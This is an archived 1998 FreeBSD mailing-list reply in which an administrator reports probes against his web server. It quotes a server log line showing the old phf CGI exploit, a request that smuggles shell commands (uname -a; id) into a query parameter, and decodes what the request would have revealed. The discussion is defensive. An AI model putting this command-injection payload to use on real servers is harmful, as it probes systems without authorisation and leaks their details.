Date: Wed, 07 Jan 1998 12:53:28 -0500 From: Michael Brady <brady@brady.appliedtheory.com> To: Brian Handy <handy@sag.space.lockheed.com> Cc: freebsd-hackers@FreeBSD.ORG Subject: Re: HTTPD Question Message-ID: <34B3C117.EC1D3556@brady.appliedtheory.com> References: <Pine.OSF.3.96.980106140553.25588W-100000@sag.space.lockheed.com>
next in thread | previous in thread | raw e-mail | index | archive | help
Brian Handy wrote: > So, when I get something like this in my logs, what do you think it means? > > ahab.rutgers.edu - - [06/Jan/1998:10:33:18 -0800] "GET > /cgi-bin/phf?Jserver=x%0auname%20-a%0aid%0aecho%20lamer%0a&Qname=x > HTTP/1.0" 404 164 > > And httpd-errors: > > [Tue Jan 6 10:33:18 1998] access to /usr/local/www/cgi-bin/phf failed for > ahab.rutgers.edu, reason: script not found or unable to stat > > Running apache-1.2.4, and I don't have any CGI scripts available to run. > Just wondering out loud if I've got a problem. > FYI, you're not alone. The same prick tried to hit my system too with this old exploit: ahab.rutgers.edu - - [06/Jan/1998:17:48:52 -0500] "GET /cgi-bin/phf?Jserver=x%0auname%20-a%0aid%0aecho%20lamer%0a&Qname=x HTTP/1.0" 404 154 Jserver=x;uname -a;id;echo lamer; Qname=x This would of just relayed your systems basic information (type & version) and the server user's info. I guess he got ahold of some list and went nuts. The machine's IP is 128.6.142.5 and is not online when I checked (pings failed). Hopefully it's because people flooded the bastard. Anyone else get hit?
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?34B3C117.EC1D3556>